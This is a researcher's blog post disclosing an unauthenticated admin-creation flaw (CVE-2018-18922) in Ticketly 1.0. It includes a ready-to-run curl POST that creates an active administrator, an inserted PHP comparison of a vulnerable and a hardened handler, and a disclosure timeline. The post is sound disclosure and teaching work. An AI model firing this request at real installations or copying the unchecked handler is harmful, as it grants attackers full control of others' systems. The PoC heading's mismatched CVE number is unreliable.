CVE-2018-18922 Ticketly 1.0 Privilege Escalation (Add Admin)

Javier Olmedo
2 min read · Nov 26, 2018

👋 Hi guys,

Today I share with you CVE-2018-18922. This CVE is associated with a vulnerability I found in Ticketly 1.0: it allows an attacker to create an admin account through a single POST request, without being logged in to the application 😉.

Although Exploit-DB has listed my vulnerability as Cross-Site Request Forgery (CSRF), it is actually Privilege Escalation, because no user with permissions needs to be involved at all, which makes it more critical.

What is a Privilege Escalation?

Privilege escalation occurs when a user gets access to more resources or functionality than they are normally allowed, and such elevation or changes should have been prevented by the application. This is usually caused by a flaw in the application. The result is that the application performs actions with more privileges than those intended by the developer or system administrator (Thank you OWASP for the excellent explanation).

The Ticketly 1.0 vulnerability

Ticketly 1.0 is web-based ticketing software, developed in PHP and MySQL, for managing incidents as tickets. This vulnerability was discovered on July 24, 2018, and publicly disclosed on November 05, 2018.

The resource /action/add_user.php does not check the requester's permissions before processing the request, which allows an unauthenticated attacker to create an administrator account.

Example POST request:

curl -i -s -k -X 'POST' \
-H 'Host: localhost' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
--data-binary 'name=Javier&lastname=Olmedo&email=javierolmedo@hackpuntes.com&status=1&password=qwerty' \
'http://localhost/ticketly/action/add_user.php'

In the previous request, I created and activated an administrator user (Javier Olmedo). It is not necessary to confirm the email, because the status parameter is 1 (true).
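To make the root cause concrete, here is an added illustration (not Ticketly's own code, and the table and column names, the session keys and the role value are assumptions) of the kind of handler behind add_user.php: a version that trusts whatever the POST body says, and a hardened version that verifies an authenticated admin session and a CSRF token, and refuses to let the request choose the account's activation state.

```php
<?php
// Added example, not Ticketly's code. Hypothetical users table with
// name/lastname/email/status/password columns; session keys user_id,
// role and csrf_token are assumed.
declare(strict_types=1);

// --- Vulnerable shape: no session or permission check, status taken from the client ---
function add_user_vulnerable(PDO $db, array $post): bool
{
    $stmt = $db->prepare(
        'INSERT INTO users (name, lastname, email, status, password) VALUES (?, ?, ?, ?, ?)'
    );
    // A caller-supplied status=1 activates the account with no email confirmation.
    return $stmt->execute([
        $post['name'], $post['lastname'], $post['email'],
        (int) $post['status'], password_hash($post['password'], PASSWORD_DEFAULT),
    ]);
}

// --- Hardened shape ---
function require_admin(array $session): void
{
    // Only an authenticated session carrying the admin role may reach the insert.
    if (empty($session['user_id']) || ($session['role'] ?? '') !== 'admin') {
        http_response_code(403);
        exit('Forbidden');
    }
}

function require_csrf_token(array $session, array $post): void
{
    // Constant-time comparison of the per-session token against the submitted one.
    if (empty($session['csrf_token']) || empty($post['csrf_token'])
        || !hash_equals($session['csrf_token'], (string) $post['csrf_token'])) {
        http_response_code(403);
        exit('Bad CSRF token');
    }
}

function add_user_hardened(PDO $db, array $session, array $post): bool
{
    require_admin($session);
    require_csrf_token($session, $post);

    $email = filter_var($post['email'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false || strlen($post['password'] ?? '') < 12) {
        http_response_code(400);
        exit('Invalid input');
    }

    // The server decides the initial state: accounts start inactive (status 0)
    // until the email is confirmed, whatever the request body says.
    $stmt = $db->prepare(
        'INSERT INTO users (name, lastname, email, status, password) VALUES (?, ?, ?, 0, ?)'
    );
    return $stmt->execute([
        trim((string) ($post['name'] ?? '')),
        trim((string) ($post['lastname'] ?? '')),
        $email,
        password_hash($post['password'], PASSWORD_DEFAULT),
    ]);
}

// Entry point: in-memory SQLite stands in for the MySQL database so the file runs alone.
session_start();
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, lastname TEXT,'
    . ' email TEXT UNIQUE, status INTEGER, password TEXT)');

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    add_user_hardened($db, $_SESSION, $_POST);
    echo 'ok';
}
```

The difference that matters is the order of operations: the hardened handler authorizes first and only then touches the database, and it never lets the request body decide whether the new account is already active.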

Proof of Concept (POC)

CVE-2018-18921: Create an admin account

Timeline

24/07/2018 Discovered

24/07/2018 Contacted vendor

02/11/2018 Requested CVE ID

04/11/2018 CVE-2018-18922 assigned

05/11/2018 Public disclosure

References

https://hackpuntes.com/cve-2018-18922-ticketly-1-0-escalacion-de-privilegios-crear-cuenta-administrador/

Happy hacking!! 👨‍💻
